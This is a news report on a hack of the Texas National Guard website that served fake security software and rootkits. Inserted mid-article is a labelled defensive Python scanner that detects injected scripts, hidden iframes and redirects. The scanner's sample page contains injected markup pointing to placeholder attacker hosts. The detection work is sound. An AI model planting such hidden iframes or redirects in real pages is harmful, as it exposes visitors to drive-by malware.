Attackers have hacked the Web site of the Texas National Guard and are using it to serve up offers of fake security software and plant rootkits on unpatched PCs, a security researcher said today.
The National Guard's site was hacked sometime before yesterday, said Roger Thompson, the chief research officer of Czech Republic-based security vendor AVG Technologies Cz SRO. Thompson confirmed Thursday that the site was still pushing phony antispyware software and infecting users with a rootkit.
"It's still infective," Thompson said today in an instant message exchange. "I did a refresh, and [it] whacked me."
A spokeswoman for the Texas National Guard, Chief Master Sergeant Gonda Moncada, acknowledged the hack midday. "We are aware of the situation and are working hard to fix it," she said in an e-mail.
According to Thompson's original analysis, malicious code planted on the agency's site sends the visitor's browser to the hacker site. "[That's] probably in Russia," said Thompson, "[but I] can't confirm it, because the ISP for the host is not answering whois queries."
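The injection Thompson describes (code planted on a legitimate page that sends the visitor's browser to a third-party host) is the kind of thing a site operator can check for on their own pages. The following is an added example, not code from the article, from AVG or from the National Guard; it assumes the operator knows their site's legitimate hostnames (`TRUSTED_HOSTS` below is a placeholder), and the sample HTML is constructed to show the pattern, not the actual code found on the site.

```python
"""Scan a page's HTML for injected redirects to hosts outside the site.

Added example, not from the original article. Flags external <script src>,
hidden or external <iframe>, <meta http-equiv="refresh"> to another host,
and inline JavaScript that assigns window.location to an external URL.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hostnames the operator treats as their own (assumed placeholder values).
TRUSTED_HOSTS = {"example-guard.test", "www.example-guard.test"}

# Inline JavaScript that moves the browser to an absolute URL.
JS_REDIRECT = re.compile(
    r"(window\.)?location(\.href)?\s*=\s*['\"](?P<url>https?://[^'\"]+)['\"]", re.I)
# The url= part of a meta refresh content attribute.
META_REFRESH = re.compile(r"url\s*=\s*(?P<url>\S+)", re.I)


def external_host(url):
    """Return the lowercased hostname if the URL points off-site, else None."""
    host = urlparse(url).hostname
    if host and host.lower() not in TRUSTED_HOSTS:
        return host.lower()
    return None


class InjectionScanner(HTMLParser):
    """Collects (kind, host, detail) findings while parsing a page."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True  # html.parser hands us the script body via handle_data
            h = external_host(a.get("src") or "")
            if h:
                self.findings.append(("external-script", h, a["src"]))
        elif tag == "iframe":
            src = a.get("src") or ""
            h = external_host(src)
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            if h:
                kind = "hidden-iframe" if hidden else "external-iframe"
                self.findings.append((kind, h, src))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_REFRESH.search(a.get("content") or "")
            if m:
                h = external_host(m.group("url"))
                if h:
                    self.findings.append(("meta-refresh", h, m.group("url")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for m in JS_REDIRECT.finditer(data):
                h = external_host(m.group("url"))
                if h:
                    self.findings.append(("js-redirect", h, m.group("url")))


def scan_html(html):
    """Return the list of (kind, host, detail) findings for one page."""
    p = InjectionScanner()
    p.feed(html)
    p.close()
    return p.findings


def suspicious_hosts(html):
    """Sorted set of off-site hosts a page would pull code from or redirect to."""
    return sorted({h for _, h, _ in scan_html(html)})


# Constructed sample page: legitimate content plus two injected elements.
SAMPLE_HTML = """<html><head><title>Constructed sample page</title>
<script src="/js/site.js"></script>
<script src="http://malicious.example.invalid/x.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://bad-host.example.invalid/in.cgi?3" width="0" height="0"></iframe>
<script>
  // injected: bounce the visitor to the attacker host
  window.location = "http://bad-host.example.invalid/land.php";
</script>
<a href="http://www.example-guard.test/news">news</a>
</body></html>"""

if __name__ == "__main__":
    for kind, host, detail in scan_html(SAMPLE_HTML):
        print(f"{kind:16} {host:28} {detail}")
```

Run it against a page fetched from the site itself (not from a cache), since injected code is often served conditionally; any off-site host in the output that the operator did not put there is worth investigating, and a hidden iframe or a bare `window.location` assignment near the end of the document is the classic shape of this kind of injection.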
The malicious site tries to trick users into forking over money for fake security software, said Thompson. "If you're not patched, when you close your browser, you find that your desktop has changed," he said, referring to a pop-up message that claims the user's PC is infected with spyware.
"This machine is now hopelessly nailed, and code has been installed in the background, and their pitch is that they'll remove it for a mere $49.95, and insert your credit card number here, please," said Thompson.
In the background, the attackers also plant a rootkit, software that conceals the installed malware so that legitimate security software has a much harder time detecting and removing it.
Moncada did not respond to other questions, including when the site would be cleansed of the malicious code and how it had gotten onto the site.